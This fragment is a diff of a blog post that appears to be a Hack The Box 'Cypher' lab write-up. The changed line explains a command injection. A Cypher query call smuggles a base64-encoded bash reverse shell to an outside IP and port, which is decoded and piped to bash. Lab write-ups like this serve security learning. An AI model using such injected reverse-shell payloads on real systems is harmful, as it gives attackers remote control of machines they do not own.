k1tch0p/k1tch0p.github.io/_posts/2025-07-31-HTB_cypher.md

 ```plaintext
 CALL custom.getUrlStatusCode(\"x; echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjIyLzQ0NDQgMD4mMQo=|base64 -d | bash\")
 ```
-So we write some string in the url parameters followed  by a ; to end the dummy command, then we inject our reverse shell, so it's basically in base64, to be decoded and piped to bash to be executed.
+So we write some string in the url parameters followed  by a ; to end the command, then we inject our reverse shell, so it's basically in base64, to be decoded and piped to bash to be executed.

 (The reverse shell used for this)
 ```bash